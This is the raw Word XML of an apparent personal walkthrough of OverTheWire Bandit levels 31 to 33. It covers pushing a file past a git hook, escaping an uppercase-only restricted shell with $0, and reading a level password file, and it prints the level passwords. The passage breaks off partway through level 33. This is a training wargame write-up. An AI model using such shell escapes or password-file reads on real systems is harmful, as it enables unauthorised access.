      <w:r w:rsidRPr="0094290C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git branch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">) and with the command </w:t>
      </w:r>
      <w:r w:rsidRPr="0094290C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>echo ‘May I come in?’ &gt; key.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="0094290C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>I created the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D608F0" w14:textId="316F01D6" w:rsidR="00731DCE" w:rsidRDefault="00731DCE" w:rsidP="00672FA6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Then, I tried to push the file using the command git push, but nothing happened (with the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00731DCE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git status</w:t>
      </w:r>
      <w:r w:rsidRPr="00731DCE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>I saw there is no change!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A98A042" w14:textId="4F6E3BCA" w:rsidR="00731DCE" w:rsidRDefault="00731DCE" w:rsidP="00731DC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checked the </w:t>
      </w:r>
      <w:r w:rsidRPr="00731DCE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> file (using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00731DCE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat .gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>), and saw it ignores all the files with the extension txt!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8A047" w14:textId="77777777" w:rsidR="00731DCE" w:rsidRDefault="00731DCE" w:rsidP="00731DC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194898D9" w14:textId="319F05AC" w:rsidR="00731DCE" w:rsidRDefault="00731DCE" w:rsidP="00731DCE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removed the .gitignore file using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00731DCE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>rm .gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">commited the changes using the command </w:t>
      </w:r>
      <w:r w:rsidR="001A54A7" w:rsidRPr="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">git commit </w:t>
      </w:r>
      <w:r w:rsidR="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r w:rsidR="001A54A7" w:rsidRPr="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>-m “added key.txt file and removed gitignore file”</w:t>
      </w:r>
      <w:r w:rsidR="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, pushed It using the command </w:t>
      </w:r>
      <w:r w:rsidR="001A54A7" w:rsidRPr="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git push</w:t>
      </w:r>
      <w:r w:rsidR="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E803E" w14:textId="31387BF9" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Counting objects: 3, done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A9C32" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delta compression using up to 4 threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54671A8E" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compressing objects: 100% (2/2), done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1272A51C" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Writing objects: 100% (3/3), 312 bytes | 0 bytes/s, done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5334EFBF" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total 3 (delta 0), reused 0 (delta 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE64A7" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: ### Attempting to validate files... ####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC83495" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419610C5" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E2AD6" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E2257" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Well done! Here is the password for the next level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C85234" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">remote: </w:t>
      </w:r>
      <w:r w:rsidRPr="001A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>56a9bf19c63d650ce78e6ec0354ee45e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E064C44" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A88918" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A046FE" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD0600F" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To ssh://localhost/home/bandit31-git/repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01D480" w14:textId="77777777" w:rsidR="001A54A7" w:rsidRPr="001A54A7" w:rsidRDefault="001A54A7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A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ! [remote rejected] master -&gt; master (pre-receive hook declined)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D25D3" w14:textId="52514E20" w:rsidR="001A54A7" w:rsidRDefault="001A54A7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1A54A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142EF7DF" w14:textId="1B846EF7" w:rsidR="00EE3D0D" w:rsidRDefault="00EE3D0D" w:rsidP="001A54A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EE3D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bandit32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C8418" w14:textId="5F3252F1" w:rsidR="00B25C20" w:rsidRDefault="00B25C20" w:rsidP="00B25C2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The first thing that caught my eye was the line: “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25C20">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WELCOME TO THE UPPERCASE SHELL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>” when I logged in</w:t>
      </w:r>
      <w:r w:rsidR="005D6114">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user. Every command I </w:t>
      </w:r>
      <w:r w:rsidR="00A20DFD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>enter;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000756E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>converts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000756E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>uppercase</w:t>
      </w:r>
      <w:r w:rsidR="009F28EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="000756E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">for example: </w:t>
      </w:r>
      <w:r w:rsidR="009F28EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ls -&gt; LS)</w:t>
      </w:r>
      <w:r w:rsidR="00F07D29">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D44172" w14:textId="10A84E29" w:rsidR="00F07D29" w:rsidRDefault="00F07D29" w:rsidP="00B25C2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23CB472C" w14:textId="44732F55" w:rsidR="00715D90" w:rsidRDefault="00A76146" w:rsidP="00B25C2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After I read inside the sh manual (using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00A76146">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>man sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="00286B0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I enter</w:t>
      </w:r>
      <w:r w:rsidR="00D12D48">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00286B0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00286B0D" w:rsidRPr="00D12D48">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>$0</w:t>
      </w:r>
      <w:r w:rsidR="00286B0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF5EEE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="000756E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>gain normal shell again (the uppercase-shell is an interactive shell and with the variable $0 we can gain normal shell!)</w:t>
      </w:r>
      <w:r w:rsidR="00D12D48">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C6594" w14:textId="2541BC0E" w:rsidR="00D12D48" w:rsidRDefault="00D12D48" w:rsidP="00B25C2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5138DE55" w14:textId="0C4F9FD0" w:rsidR="00D12D48" w:rsidRDefault="00D12D48" w:rsidP="00D12D48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bookmarkStart w:id="4" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">I enter the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12D48">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /etc/bandit_pass/bandit33</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12D48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>for displaying the next level password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3EA8A" w14:textId="23E99743" w:rsidR="00D12D48" w:rsidRDefault="00D12D48" w:rsidP="00B25C2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 w:rsidRPr="00D12D48">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12D48">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c9c3199ddf4121b10cf581a98d51caee</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12D48">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C7E80A" w14:textId="1B99566D" w:rsidR="00D12D48" w:rsidRDefault="00D12D48" w:rsidP="00B25C2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64956724" w14:textId="77777777" w:rsidR="00BF5EEE" w:rsidRPr="004C2087" w:rsidRDefault="00BF5EEE" w:rsidP="00B25C2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</w:p>
    <w:p w14:paraId="216E05AF" w14:textId="5EFBAD65" w:rsidR="00A20DFD" w:rsidRDefault="004C2087" w:rsidP="00B25C2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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C2087">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7837DB12" w14:textId="6FCE8C83" w:rsidR="001856B0" w:rsidRDefault="001856B0" w:rsidP="00B25C2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I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="001856B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="001856B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and saw there was a single file named </w:t>
      </w:r>
      <w:r w:rsidRPr="001856B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>README</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F16537" w14:textId="3D53C07F" w:rsidR="001856B0" w:rsidRDefault="001856B0" w:rsidP="00B25C2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With the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00F64595">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat README</w:t>
      </w:r>
      <w:r w:rsidR="00F64595" w:rsidRPr="00F64595">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> I got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D9285" w14:textId="77777777" w:rsidR="001856B0" w:rsidRPr="00456D2D" w:rsidRDefault="001856B0" w:rsidP="001856B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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001856B0">
        <w:rPr>
